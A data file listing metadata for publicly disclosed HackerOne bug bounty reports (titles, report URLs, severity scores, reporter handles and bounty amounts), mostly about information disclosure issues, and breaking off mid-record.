null
---
### Title
Server and PHP version Disclosed in Response Header
#### URL
https://hackerone.com/reports/123194
#### Severity score
null
#### Reporter
bugs3ra
### Bounty paid
null
---
### Title
Arbitrary heap overread in strscan on 32 bit Ruby, patch included
#### URL
https://hackerone.com/reports/166661
#### Severity score
null
#### Reporter
guido
### Bounty paid
$200
---
### Title
Disclosure of 152 cookie names via crafted input
#### URL
https://hackerone.com/reports/310105
#### Severity score
null
#### Reporter
albinowax
### Bounty paid
$100
---
### Title
Extra program metrics disclosed via /PROGRAM_NAME json response
#### URL
https://hackerone.com/reports/327088
#### Severity score
5
#### Reporter
yaworsk
### Bounty paid
$500
---
### Title
Ability to add pishing links in discusion ," Bypassing uneductional Links add "
#### URL
https://hackerone.com/reports/62301
#### Severity score
null
#### Reporter
zeyadk
### Bounty paid
$100
---
### Title
Раскрытие информации о частной группе или приложении
#### URL
https://hackerone.com/reports/216289
#### Severity score
null
#### Reporter
trainzment
### Bounty paid
$100
---
### Title
User Information Disclosure via the REST API - /?_method=GET
#### URL
https://hackerone.com/reports/384782
#### Severity score
null
#### Reporter
lovepakistan
### Bounty paid
$50
---
### Title
Image injection /br/games/info may lead to phishing attacks or FB OAuth theft.
#### URL
https://hackerone.com/reports/510388
#### Severity score
null
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
Private snippets in public / internal projects leaked though GitLab API
#### URL
https://hackerone.com/reports/134305
#### Severity score
null
#### Reporter
jobert
### Bounty paid
null
---
### Title
"early preview" programs disclosure
#### URL
https://hackerone.com/reports/29185
#### Severity score
null
#### Reporter
d4d1a179c0f3
### Bounty paid
null
---
### Title
[otus.p.mail.ru] CRLF Injection
#### URL
https://hackerone.com/reports/99268
#### Severity score
null
#### Reporter
bigbear_
### Bounty paid
null
---
### Title
[https://city-mobil.ru/taxiserv] IDOR leads to information disclosure
#### URL
https://hackerone.com/reports/746513
#### Severity score
3.4
#### Reporter
act1on3
### Bounty paid
$1,500
---
### Title
[gamesventures.mail.ru] Publicly accessible GIT directory
#### URL
https://hackerone.com/reports/239481
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
null
---
### Title
Research papers on yelp are getting indexed by google bots.
#### URL
https://hackerone.com/reports/207435
#### Severity score
null
#### Reporter
us111
### Bounty paid
null
---
### Title
Total bounties paid amount is disclosed because of redesign of the Program Profiles
#### URL
https://hackerone.com/reports/640488
#### Severity score
null
#### Reporter
asad0x01_
### Bounty paid
$500
---
### Title
TRACE disclosure attack may be possible
#### URL
https://hackerone.com/reports/4409
#### Severity score
null
#### Reporter
techintheprovince
### Bounty paid
$100
---
### Title
Full access to internal Gitlab instances at redash.gitlab.com, dashboards.gitlab.com, prometheus.gitlab.com
#### URL
https://hackerone.com/reports/498964
#### Severity score
10
#### Reporter
rijalrojan
### Bounty paid
$9,500
---
### Title
Disclosure of administrators via JSON on nextcloud.com Wordpress
#### URL
https://hackerone.com/reports/198012
#### Severity score
null
#### Reporter
rbcafe
### Bounty paid
null
---
### Title
Apache2 /icons/ folder accessible
#### URL
https://hackerone.com/reports/7923
#### Severity score
null
#### Reporter
melvin
### Bounty paid
null
---
### Title
Nginx server version disclosure on engineeringblog
#### URL
https://hackerone.com/reports/180346
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
Information Disclosure on rate limit defense mechanism
#### URL
https://hackerone.com/reports/172296
#### Severity score
null
#### Reporter
japz
### Bounty paid
$20
---
### Title
full path disclosure on www.rockstargames.com via apache filename brute forcing
#### URL
https://hackerone.com/reports/210238
#### Severity score
null
#### Reporter
geeknik
### Bounty paid
$150
---
### Title
Blind SSRF on synthetics.newrelic.com
#### URL
https://hackerone.com/reports/141304
#### Severity score
null
#### Reporter
ylujion
### Bounty paid
null
---
### Title
CSRF on https://shopify.com/plus
#### URL
https://hackerone.com/reports/114430
#### Severity score
null
#### Reporter
mdv
### Bounty paid
$500
---
### Title
SSRF на element.mail.ru
#### URL
https://hackerone.com/reports/117158
#### Severity score
null
#### Reporter
cyberpunkych
### Bounty paid
$250
---
### Title
Reward Money Leakage
#### URL
https://hackerone.com/reports/149435
#### Severity score
null
#### Reporter
xsserboiii
### Bounty paid
null
---
### Title
Back - Refresh - Attack To Obtain User Credentials
#### URL
https://hackerone.com/reports/21064
#### Severity score
null
#### Reporter
xtross1
### Bounty paid
null
---
### Title
Bulk UUID enumeration via invite codes
#### URL
https://hackerone.com/reports/145150
#### Severity score
null
#### Reporter
vijay_kumar
### Bounty paid
$1,500
---
### Title
Source code disclosure on https://107.23.69.180
#### URL
https://hackerone.com/reports/136891
#### Severity score
null
#### Reporter
ebrietas
### Bounty paid
$1,000
---
### Title
Username Enumeration
#### URL
https://hackerone.com/reports/667613
#### Severity score
null
#### Reporter
ahpaleus
### Bounty paid
null
---
### Title
Information disclosure to "Permission as auditor" user
#### URL
https://hackerone.com/reports/959897
#### Severity score
null
#### Reporter
risinghunter
### Bounty paid
$100
---
### Title
resolved bugs in a program are public despite the program settings
#### URL
https://hackerone.com/reports/270993
#### Severity score
null
#### Reporter
flashdisk
### Bounty paid
$500
---
### Title
Sensitive Support Mail Disclosure
#### URL
https://hackerone.com/reports/234947
#### Severity score
null
#### Reporter
h33t
### Bounty paid
null
---
### Title
Possible sensitive files
#### URL
https://hackerone.com/reports/8019
#### Severity score
null
#### Reporter
0xsaikiran
### Bounty paid
null
---
### Title
Exposure of tinyMCE js source code with plugin version disclosure which can leads to exploit further attacks.
#### URL
https://hackerone.com/reports/463123
#### Severity score
null
#### Reporter
wolfdroid
### Bounty paid
null
---
### Title
Content Spoofing
#### URL
https://hackerone.com/reports/90753
#### Severity score
null
#### Reporter
girish_s_pattanashetty
### Bounty paid
$50
---
### Title
CRITICAL full source code/config disclosure for Cameo
#### URL
https://hackerone.com/reports/43998
#### Severity score
null
#### Reporter
avlidienbrunn
### Bounty paid
$100
---
### Title
Information disclosure (system username, server info) in the x-amz-meta-s3cmd-attrs response header on data.gov
#### URL
https://hackerone.com/reports/667032
#### Severity score
null
#### Reporter
ninja_cyber007
### Bounty paid
null
---
### Title
Private program disclosure via `vpn_suspended` GraphQL query
#### URL
https://hackerone.com/reports/715192
#### Severity score
null
#### Reporter
unknown_person
### Bounty paid
$2,500
---
### Title
Redmin API Key Exposed In GIthub
#### URL
https://hackerone.com/reports/901210
#### Severity score
6.1
#### Reporter
elmahdi
### Bounty paid
$400
---
### Title
Banner Grabbing - Apache Server Version Disclousure
#### URL
https://hackerone.com/reports/460556
#### Severity score
null
#### Reporter
hamzamandil
### Bounty paid
null
---
### Title
Дубликат: https://hackerone.com/reports/219171 (доступ к аккаунту, через сброс пароля)
#### URL
https://hackerone.com/reports/222252
#### Severity score
null
#### Reporter
norver
### Bounty paid
$1,000
---
### Title
Possible to steal any protected files on Android
#### URL
https://hackerone.com/reports/161710
#### Severity score
null
#### Reporter
bagipro
### Bounty paid
$500
---
### Title
JDBC credentials leaked via github
#### URL
https://hackerone.com/reports/935573
#### Severity score
null
#### Reporter
walidhossain
### Bounty paid
null
---
### Title
THX Tuneup Survey feedback disclosure via Google cached content for apps.thx.com
#### URL
https://hackerone.com/reports/751729
#### Severity score
3.7
#### Reporter
jackb898
### Bounty paid
$200
---
### Title
Flash local-with-fileaccess Sandbox Bypass
#### URL
https://hackerone.com/reports/2140
#### Severity score
null
#### Reporter
kinine
### Bounty paid
$2,000
---
### Title
Disclosure of information about the system, configuration files.
#### URL
https://hackerone.com/reports/364910
#### Severity score
null
#### Reporter
fr_0_ank
### Bounty paid
null
---
### Title
h1-ctf writeup , finally paid the payments by chaining multiple bugs
#### URL
https://hackerone.com/reports/894110
#### Severity score
null
#### Reporter
d1r3wolf
### Bounty paid
null
---
### Title
Server version is disclosure in http://leasewebnoc.com/
#### URL
https://hackerone.com/reports/119666
#### Severity score
null
#### Reporter
secdoor
### Bounty paid
null
---
### Title
Information Disclosure of Garbage Collection Cycle
#### URL
https://hackerone.com/reports/981796
#### Severity score
null
#### Reporter
ahmd_halabi
### Bounty paid
$100
---
### Title
ADB Backup is enabled within AndroidManifest
#### URL
https://hackerone.com/reports/170398
#### Severity score
null
#### Reporter
sfsecurityfirst
### Bounty paid
null
---
### Title
Estimation of a Lower Bound on Number of Uber Drivers via Enumeration
#### URL
https://hackerone.com/reports/125488
#### Severity score
null
#### Reporter
ddworken
### Bounty paid
$500
---
### Title
Know whether private program for company exist or not
#### URL
https://hackerone.com/reports/105887
#### Severity score
null
#### Reporter
ashish_r_padelkar
### Bounty paid
$500
---
### Title
Stealing Facebook OAuth Code Through Screenshot viewer
#### URL
https://hackerone.com/reports/488269
#### Severity score
5.8
#### Reporter
netfuzzer
### Bounty paid
$750
---
### Title
Disclosure of information on static.dl.mail.ru
#### URL
https://hackerone.com/reports/201948
#### Severity score
null
#### Reporter
rbcafe
### Bounty paid
null
---
### Title
LFI through the MySQL connection
#### URL
https://hackerone.com/reports/719875
#### Severity score
null
#### Reporter
muon4
### Bounty paid
null
---
### Title
Calendar and addressbook names disclosed (NC-SA-2017-012)
#### URL
https://hackerone.com/reports/203594
#### Severity score
3.5
#### Reporter
juliushaertl
### Bounty paid
$183
---
### Title
Searching from Hacktivity returns hits for words in limited disclosure reports that are not visible
#### URL
https://hackerone.com/reports/685909
#### Severity score
4.4
#### Reporter
nathand
### Bounty paid
$2,500
---
### Title
Nginx version disclosure via forbidden page
#### URL
https://hackerone.com/reports/197880
#### Severity score
null
#### Reporter
overlax
### Bounty paid
null
---
### Title
SSRF+XSS
#### URL
https://hackerone.com/reports/326043
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Private program policy page still accessible after user left the program
#### URL
https://hackerone.com/reports/386997
#### Severity score
4.2
#### Reporter
japz
### Bounty paid
$2,500
---
### Title
Invited team member can disclosure slack channels
#### URL
https://hackerone.com/reports/509574
#### Severity score
null
#### Reporter
eremeev
### Bounty paid
$500
---
### Title
PHP PDOException and Full Path Disclosure
#### URL
https://hackerone.com/reports/19363
#### Severity score
null
#### Reporter
supernatural
### Bounty paid
null
---
### Title
Full Path Disclosure (FPD) in www.localize.io
#### URL
https://hackerone.com/reports/8088
#### Severity score
null
#### Reporter
faisalahmed
### Bounty paid
null
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/189458
#### Severity score
null
#### Reporter
khizer47
### Bounty paid
null
---
### Title
Information Disclosure on https://theendlessweb.com/
#### URL
https://hackerone.com/reports/461598
#### Severity score
null
#### Reporter
dhamu_harker
### Bounty paid
null
---
### Title
[moba.my.com] phpinfo, logs
#### URL
https://hackerone.com/reports/410793
#### Severity score
0
#### Reporter
bobrov
### Bounty paid
null
---
### Title
Keys
#### URL
https://hackerone.com/reports/269831
#### Severity score
null
#### Reporter
ashishag29
### Bounty paid
null
---
### Title
image injection /screenshot-viewer/responsive/image (ANOTHER FIX BYPASS)
#### URL
https://hackerone.com/reports/506126
#### Severity score
null
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
PHP version disclosed on blog.algolia.com
#### URL
https://hackerone.com/reports/116692
#### Severity score
null
#### Reporter
bugs3ra
### Bounty paid
null
---
### Title
All Vimeo Private videos disclosure via Authorization Bypass
#### URL
https://hackerone.com/reports/137502
#### Severity score
null
#### Reporter
opnsec
### Bounty paid
$600
---
### Title
Email Address Leak
#### URL
https://hackerone.com/reports/123170
#### Severity score
null
#### Reporter
mikkz
### Bounty paid
null
---
### Title
FULL PATH DISCLOSUR
#### URL
https://hackerone.com/reports/7736
#### Severity score
null
#### Reporter
benamarouche
### Bounty paid
null
---
### Title
User Information Disclosure via Json response
#### URL
https://hackerone.com/reports/335779
#### Severity score
null
#### Reporter
d3ad1y_b0073r
### Bounty paid
$50
---
### Title
JSON serialization of any Project model results in all Runner tokens being exposed through Quick Actions
#### URL
https://hackerone.com/reports/509924
#### Severity score
9.1
#### Reporter
jobert
### Bounty paid
$12,000
---
### Title
Using an outdated version of OpenSSH on db01.wakatime.com
#### URL
https://hackerone.com/reports/246780
#### Severity score
null
#### Reporter
silv3rpoision
### Bounty paid
null
---
### Title
Information Disclosure on stun.screenhero.com
#### URL
https://hackerone.com/reports/175061
#### Severity score
6.5
#### Reporter
kazan71p
### Bounty paid
$700
---
### Title
[vulners.com] nginx alias_traversal
#### URL
https://hackerone.com/reports/317201
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
null
---
### Title
Accessible Druid Monitor console on https://api.pay-staging.razer.com/
#### URL
https://hackerone.com/reports/702784
#### Severity score
null
#### Reporter
0xklaue
### Bounty paid
$1,500
---
### Title
Private information exposed through GraphQL filters
#### URL
https://hackerone.com/reports/645299
#### Severity score
6.1
#### Reporter
reigertje
### Bounty paid
null
---
### Title
Password disclosure during signup process
#### URL
https://hackerone.com/reports/127766
#### Severity score
null
#### Reporter
foundstone-kunal
### Bounty paid
null
---
### Title
Server header - information disclosure
#### URL
https://hackerone.com/reports/7914
#### Severity score
null
#### Reporter
vhssunny1
### Bounty paid
null
---
### Title
PII Leak of USCG Designated Examiner List at https://www.███
#### URL
https://hackerone.com/reports/1007702
#### Severity score
null
#### Reporter
nagli
### Bounty paid
null
---
### Title
SSRF on █████████ Allowing internal server data access
#### URL
https://hackerone.com/reports/326040
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Program profile_metrics.json contains time to triage for deptofdefense even it's turned off
#### URL
https://hackerone.com/reports/318399
#### Severity score
null
#### Reporter
kunal94
### Bounty paid
$250
---
### Title
ClientId gives away platform (iOS/Android) from which a secret was posted.
#### URL
https://hackerone.com/reports/19210
#### Severity score
null
#### Reporter
denull
### Bounty paid
null
---
### Title
Hardcoded credentials in Android App
#### URL
https://hackerone.com/reports/412772
#### Severity score
null
#### Reporter
madrobot
### Bounty paid
null
---
### Title
CSV Injection at Camptix Event Ticketing
#### URL
https://hackerone.com/reports/151516
#### Severity score
null
#### Reporter
thezawad
### Bounty paid
$375
---
### Title
Information Disclosure in Error Page
#### URL
https://hackerone.com/reports/115219
#### Severity score
null
#### Reporter
vichaarya
### Bounty paid
null
---
### Title
Username Information Disclosure via Json response - Using parameter number Intruder
#### URL
https://hackerone.com/reports/812351
#### Severity score
null
#### Reporter
0xrobot
### Bounty paid
null
---
### Title
Information disclosure on sim.starbucks.com
#### URL
https://hackerone.com/reports/632808
#### Severity score
null
#### Reporter
johnstone
### Bounty paid
null
---
### Title
HTTP Track/Trace Method Enabled
#### URL
https://hackerone.com/reports/119860
#### Severity score
null
#### Reporter
zephrfish
### Bounty paid
$50
---
### Title
Image Injection on /bully/anniversaryedition may lead to OAuth token theft.
#### URL
https://hackerone.com/reports/498358
#### Severity score
5.8
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
Debug.log file Exposed to Public \Full Path Disclosure\
#### URL
https://hackerone.com/reports/202939
#### Severity score
null
#### Reporter
khizer47
### Bounty paid
null
---
### Title
http://████/data.json showing users sensitive information via json file
#### URL
https://hackerone.com/reports/184472
#### Severity score
null
#### Reporter
00utsav00
### Bounty paid
null
---
### Title
Able To Check The Exact Bounty Balance of any Bug Bounty Program
#### URL
https://hackerone.com/reports/293593
#### Severity score
5
#### Reporter
cjlegacion
### Bounty paid
null
---
### Title
Раскрытие баланса на //kopilka.qiwi.com
#### URL
https://hackerone.com/reports/178049
#### Severity score
null
#### Reporter
nstikhomirov
### Bounty paid
$300
---
### Title
Already Registered Email Disclosure
#### URL
https://hackerone.com/reports/223343
#### Severity score
null
#### Reporter
anonymans
### Bounty paid
null
---
### Title
S3 bucket data at http://rockset-support.s3-us-west-2.amazonaws.com/ reveals user addresses based on latitudes and longitudes.
#### URL
https://hackerone.com/reports/947725
#### Severity score
8.3
#### Reporter
boy_child_
### Bounty paid
null
---
### Title
Stealing Private Information in VK Android App through PlayerProxy Port Remotely
#### URL
https://hackerone.com/reports/292761
#### Severity score
null
#### Reporter
heeeeen
### Bounty paid
$700
---
### Title
Phone Number Enumeration
#### URL
https://hackerone.com/reports/138881
#### Severity score
null
#### Reporter
megocode3
### Bounty paid
null
---
### Title
Exposing debug.log file leads to server full path disclosure
#### URL
https://hackerone.com/reports/696360
#### Severity score
null
#### Reporter
sohelahmed786
### Bounty paid
null
---
### Title
Source code and internal credentials disclosure
#### URL
https://hackerone.com/reports/898522
#### Severity score
8.9
#### Reporter
paul_axe
### Bounty paid
$1,000
---
### Title
Arbitrary Local-File Read from Admin - Restore From Backup due to Symlinks
#### URL
https://hackerone.com/reports/213558
#### Severity score
null
#### Reporter
ziot
### Bounty paid
$512
---
### Title
Nginx Version Disclosure On Forbidden Page
#### URL
https://hackerone.com/reports/148768
#### Severity score
null
#### Reporter
mefkan
### Bounty paid
null
---
### Title
Disclosure of User Information
#### URL
https://hackerone.com/reports/753725
#### Severity score
null
#### Reporter
shardulb_23
### Bounty paid
$100
---
### Title
error
#### URL
https://hackerone.com/reports/309594
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
NPM_API_KEY Leak
#### URL
https://hackerone.com/reports/944732
#### Severity score
null
#### Reporter
rzx007x
### Bounty paid
$150
---
### Title
Information Disclosure of .htaccess file in Private Server/Subdomain
#### URL
https://hackerone.com/reports/163106
#### Severity score
null
#### Reporter
ahsan
### Bounty paid
null
---
### Title
Multiple Information Disclosure with Go PPROF on api-ne.mackeeper.com
#### URL
https://hackerone.com/reports/783807
#### Severity score
null
#### Reporter
m4-k
### Bounty paid
$50
---
### Title
Получение оригинала скрытого изображения
#### URL
https://hackerone.com/reports/143669
#### Severity score
null
#### Reporter
nikitchenko
### Bounty paid
$280
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/195638
#### Severity score
null
#### Reporter
sp1d3rs
### Bounty paid
null
---
### Title
Full path disclosure vulnerability via Upload .htaccess file
#### URL
https://hackerone.com/reports/919429
#### Severity score
null
#### Reporter
arezthehopebuster_
### Bounty paid
null
---
### Title
Server version disclosure
#### URL
https://hackerone.com/reports/149483
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
Access to Grafana Dashboard
#### URL
https://hackerone.com/reports/186586
#### Severity score
null
#### Reporter
thehackerish
### Bounty paid
null
---
### Title
Information disclosure when trying to delete an expense's attachment on m.mavenlink.com
#### URL
https://hackerone.com/reports/299334
#### Severity score
null
#### Reporter
aroly
### Bounty paid
$500
---
### Title
[id.rapida.ru] Full Path Disclosure
#### URL
https://hackerone.com/reports/165219
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
$50
---
### Title
View all deleted comments and rating of any app .
#### URL
https://hackerone.com/reports/135756
#### Severity score
null
#### Reporter
vijay_kumar
### Bounty paid
$500
---
### Title
htaccess file is accesible
#### URL
https://hackerone.com/reports/182017
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
HackerOne support disclosing report state without checking user identity
#### URL
https://hackerone.com/reports/356566
#### Severity score
3.8
#### Reporter
amans
### Bounty paid
$500
---
### Title
[avito.ru] Утекают креды от платежных провайдеров
#### URL
https://hackerone.com/reports/271360
#### Severity score
null
#### Reporter
kxyry
### Bounty paid
null
---
### Title
phpinfo
#### URL
https://hackerone.com/reports/521779
#### Severity score
0
#### Reporter
linkks
### Bounty paid
null
---
### Title
Elmah.axd is publicly accessible and leaking Error Log for ROOT on █████_PRD_WEB1 █████████elmah.axd
#### URL
https://hackerone.com/reports/962753
#### Severity score
null
#### Reporter
rudra_2000
### Bounty paid
null
---
### Title
Subdomain Takeover
#### URL
https://hackerone.com/reports/113869
#### Severity score
null
#### Reporter
kiraak-boy
### Bounty paid
null
---
### Title
Information Disclosure, groups.yahoo.com,6-april-2014, #SpringClean
#### URL
https://hackerone.com/reports/5986
#### Severity score
null
#### Reporter
defmax
### Bounty paid
null
---
### Title
Uninitilized server memory disclosure via ImageMagick
#### URL
https://hackerone.com/reports/294548
#### Severity score
null
#### Reporter
hudmi
### Bounty paid
$300
---
### Title
Открытая панель
#### URL
https://hackerone.com/reports/454770
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
External Service Interaction | https://█████████.mil
#### URL
https://hackerone.com/reports/997988
#### Severity score
null
#### Reporter
x3ph_
### Bounty paid
null
---
### Title
Full path disclosure at ads.twitter.com
#### URL
https://hackerone.com/reports/26825
#### Severity score
null
#### Reporter
internetwache
### Bounty paid
$140
---
### Title
SSRF issue in "URL target" allows [REDACTED]
#### URL
https://hackerone.com/reports/58897
#### Severity score
null
#### Reporter
agarri_fr
### Bounty paid
$100
---
### Title
Server version disclosure on [jenkins.brew.sh]
#### URL
https://hackerone.com/reports/221989
#### Severity score
null
#### Reporter
neutrinoguy
### Bounty paid
null
---
### Title
Information Disclosure - Composer.lock
#### URL
https://hackerone.com/reports/294568
#### Severity score
null
#### Reporter
bhenner__
### Bounty paid
null
---
### Title
Full Path Disclosure In EasyDB
#### URL
https://hackerone.com/reports/119494
#### Severity score
null
#### Reporter
supernatural
### Bounty paid
null
---
### Title
bypass to csv injection
#### URL
https://hackerone.com/reports/161290
#### Severity score
null
#### Reporter
superngorksky
### Bounty paid
null
---
### Title
IDOR - Deleting other user's signature via /appsuite/api/snippet?action=update (although an error is thrown)
#### URL
https://hackerone.com/reports/199321
#### Severity score
null
#### Reporter
inhibitor181
### Bounty paid
$300
---
### Title
[Cross Domain Referrer Leakage] Password Reset Token Leaking to Third party Sites.
#### URL
https://hackerone.com/reports/265740
#### Severity score
null
#### Reporter
ykw1337
### Bounty paid
$40
---
### Title
Minor Bug: Public un-compiled CSS with original sass, versioning, source map, comments, etc.
#### URL
https://hackerone.com/reports/90367
#### Severity score
null
#### Reporter
ericr
### Bounty paid
null
---
### Title
Full path disclosure
#### URL
https://hackerone.com/reports/7894
#### Severity score
null
#### Reporter
siddiki
### Bounty paid
null
---
### Title
Дорк
#### URL
https://hackerone.com/reports/117902
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$100
---
### Title
3rd party shop admin panel blind XSS
#### URL
https://hackerone.com/reports/336145
#### Severity score
null
#### Reporter
w2w
### Bounty paid
null
---
### Title
Information Disclosure and Privilege Escalation in app.goodhire.com/member/developers/api-settings
#### URL
https://hackerone.com/reports/276976
#### Severity score
8.5
#### Reporter
hackedbrain
### Bounty paid
$750
---
### Title
Source code disclosure
#### URL
https://hackerone.com/reports/521960
#### Severity score
5.3
#### Reporter
linkks
### Bounty paid
$500
---
### Title
Уязвимость приватных записей пользователя (личных)
#### URL
https://hackerone.com/reports/65966
#### Severity score
null
#### Reporter
pisarenko
### Bounty paid
$400
---
### Title
Image Injection vulnerability affecting www.rockstargames.com/careers may lead to Facebook OAuth Theft
#### URL
https://hackerone.com/reports/491654
#### Severity score
null
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
Full path disclosure when CSRF validation failed
#### URL
https://hackerone.com/reports/148890
#### Severity score
null
#### Reporter
abdullah
### Bounty paid
null
---
### Title
News Feed Detected
#### URL
https://hackerone.com/reports/163730
#### Severity score
null
#### Reporter
mansouri_badis
### Bounty paid
null
---
### Title
Image Upload Path Disclosure
#### URL
https://hackerone.com/reports/158021
#### Severity score
null
#### Reporter
mefkan
### Bounty paid
$100
---
### Title
Private Program Disclosure in /:handle/settings/allow_report_submission.json endpoint
#### URL
https://hackerone.com/reports/116798
#### Severity score
null
#### Reporter
charfee
### Bounty paid
$500
---
### Title
Exposed debug.log file leads to information disclosure
#### URL
https://hackerone.com/reports/775504
#### Severity score
null
#### Reporter
md15ev
### Bounty paid
null
---
### Title
Email ID Disclosure.
#### URL
https://hackerone.com/reports/146106
#### Severity score
null
#### Reporter
bugdiscloseguys
### Bounty paid
null
---
### Title
PHP info page disclosure on http://www.day.dk/
#### URL
https://hackerone.com/reports/165930
#### Severity score
null
#### Reporter
0x01alka
### Bounty paid
$60
---
### Title
reopen #128853 (Information disclosure at lite.uber.com)
#### URL
https://hackerone.com/reports/129712
#### Severity score
null
#### Reporter
kusl
### Bounty paid
null
---
### Title
Data race conditions reported by helgrind when performing parallel DNS queries in libcurl
#### URL
https://hackerone.com/reports/1019457
#### Severity score
5.2
#### Reporter
brumbrum
### Bounty paid
null
---
### Title
Reports Modal in app.mopub.com Disclose by any user
#### URL
https://hackerone.com/reports/574639
#### Severity score
4.9
#### Reporter
updatelap
### Bounty paid
$280
---
### Title
HackerOne customer submitted sensitive link to VirusTotal, exposing confidential information
#### URL
https://hackerone.com/reports/378122
#### Severity score
null
#### Reporter
tester2020
### Bounty paid
$350
---
### Title
Uninitialized read in gdImageCreateFromXbm
#### URL
https://hackerone.com/reports/623588
#### Severity score
5.3
#### Reporter
chamal
### Bounty paid
$500
---
### Title
apps.owncloud.com: Mixed Active Scripting Issue
#### URL
https://hackerone.com/reports/85541
#### Severity score
null
#### Reporter
suhas_gaikwad
### Bounty paid
null
---
### Title
Image injection on /screenshot-viewer/responsive/image ( FIX BYPASS)
#### URL
https://hackerone.com/reports/505259
#### Severity score
null
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
Filename and directory enumeration
#### URL
https://hackerone.com/reports/149273
#### Severity score
null
#### Reporter
strukt
### Bounty paid
null
---
### Title
Can read features from any user
#### URL
https://hackerone.com/reports/316810
#### Severity score
null
#### Reporter
firs0v
### Bounty paid
$250
---
### Title
Session Fixation disclosing email address
#### URL
https://hackerone.com/reports/2582
#### Severity score
null
#### Reporter
xtross1
### Bounty paid
null
---
### Title
Information Disclosure on demo.weblate.org
#### URL
https://hackerone.com/reports/229620
#### Severity score
null
#### Reporter
sp1d3rs
### Bounty paid
null
---
### Title
benchmark metrics available at 5.61.239.154
#### URL
https://hackerone.com/reports/449613
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
Lack of CSRF header validation at https://g-mail.grammarly.com/profile
#### URL
https://hackerone.com/reports/629892
#### Severity score
4.2
#### Reporter
orlserg
### Bounty paid
$750
---
### Title
Error stack trace
#### URL
https://hackerone.com/reports/41469
#### Severity score
null
#### Reporter
4lemon
### Bounty paid
$100
---
### Title
Urgent: attacker can access every data source on Bime
#### URL
https://hackerone.com/reports/149907
#### Severity score
null
#### Reporter
jobert
### Bounty paid
$1,000
---
### Title
This Github Repository Seems Leaking Samokat Django Project
#### URL
https://hackerone.com/reports/1016860
#### Severity score
null
#### Reporter
gevakun
### Bounty paid
$150
---
### Title
Public access to objects in AWS S3 bucket
#### URL
https://hackerone.com/reports/202725
#### Severity score
null
#### Reporter
ehsahil
### Bounty paid
$750
---
### Title
Path disclosure in platform0.twitter.com
#### URL
https://hackerone.com/reports/44371
#### Severity score
null
#### Reporter
avicoder_
### Bounty paid
null
---
### Title
http://digital.starbucks.com/ Creation of Google G Suite Account on Behalf of starbucks.
#### URL
https://hackerone.com/reports/191179
#### Severity score
null
#### Reporter
khizer47
### Bounty paid
null
---
### Title
Default Creds Spring Boot Admin
#### URL
https://hackerone.com/reports/954818
#### Severity score
7.5
#### Reporter
testingforbugs
### Bounty paid
null
---
### Title
Leak of Platform Authentication credentials via Repeater
#### URL
https://hackerone.com/reports/302651
#### Severity score
null
#### Reporter
jupenur
### Bounty paid
$200
---
### Title
Full Path Disclosure (2)
#### URL
https://hackerone.com/reports/8013
#### Severity score
null
#### Reporter
siddiki
### Bounty paid
null
---
### Title
Bypass Tracking Blocker Protection Using Slashes Without Protocol On The Image Source.
#### URL
https://hackerone.com/reports/1050656
#### Severity score
null
#### Reporter
demonia
### Bounty paid
$1,000
---
### Title
Открытая информация phpinfo() на сайте https://agent.mail.ru
#### URL
https://hackerone.com/reports/351363
#### Severity score
null
#### Reporter
mobius07
### Bounty paid
null
---
### Title
Stealing the ip addres from users
#### URL
https://hackerone.com/reports/672499
#### Severity score
null
#### Reporter
minoto
### Bounty paid
null
---
### Title
F5 BigIP Backend Cookie Disclosure
#### URL
https://hackerone.com/reports/384905
#### Severity score
null
#### Reporter
lovepakistan
### Bounty paid
$50
---
### Title
[Airship CMS] Local File Inclusion - RST Parser
#### URL
https://hackerone.com/reports/179034
#### Severity score
null
#### Reporter
h4ckninja
### Bounty paid
null
---
### Title
Full Path disclosure on 500 error
#### URL
https://hackerone.com/reports/708076
#### Severity score
null
#### Reporter
rajauzairabdullah
### Bounty paid
null
---
### Title
Pentester can obtain information about other pentesters who applied for the same test, but weren't accepted
#### URL
https://hackerone.com/reports/958374
#### Severity score
3.4
#### Reporter
haxta4ok00
### Bounty paid
$500
---
### Title
CircleCI token in github repo allows for access to sensitive build information
#### URL
https://hackerone.com/reports/858915
#### Severity score
null
#### Reporter
dwimmerlaik
### Bounty paid
$1,500
---
### Title
Program metrics disclosed response_efficiency_percentage via /program_name json response despite the team decided not to show on their profile
#### URL
https://hackerone.com/reports/347693
#### Severity score
5
#### Reporter
japz
### Bounty paid
$2,500
---
### Title
Apache version disclosed on developer.leaseweb.com
#### URL
https://hackerone.com/reports/117593
#### Severity score
null
#### Reporter
bugs3ra
### Bounty paid
null
---
### Title
ajaxgetachievementsforgame is not guarded for unreleased apps
#### URL
https://hackerone.com/reports/835087
#### Severity score
5.3
#### Reporter
jameslll
### Bounty paid
$750
---
### Title
Public Vulnerable Version of Confluence https://confluence.olx.com
#### URL
https://hackerone.com/reports/207013
#### Severity score
null
#### Reporter
hdbreaker
### Bounty paid
null
---
### Title
CONCRETE5 - path disclosure.
#### URL
https://hackerone.com/reports/4931
#### Severity score
null
#### Reporter
smiegles
### Bounty paid
null
---
### Title
[affiliates.udemy.com] Wordpress user admin information discloure
#### URL
https://hackerone.com/reports/370777
#### Severity score
null
#### Reporter
toannc123
### Bounty paid
$50
---
### Title
Direct IP Access
#### URL
https://hackerone.com/reports/183318
#### Severity score
null
#### Reporter
ph_spade
### Bounty paid
null
---
### Title
User personal data disclosure via API
#### URL
https://hackerone.com/reports/630235
#### Severity score
4.2
#### Reporter
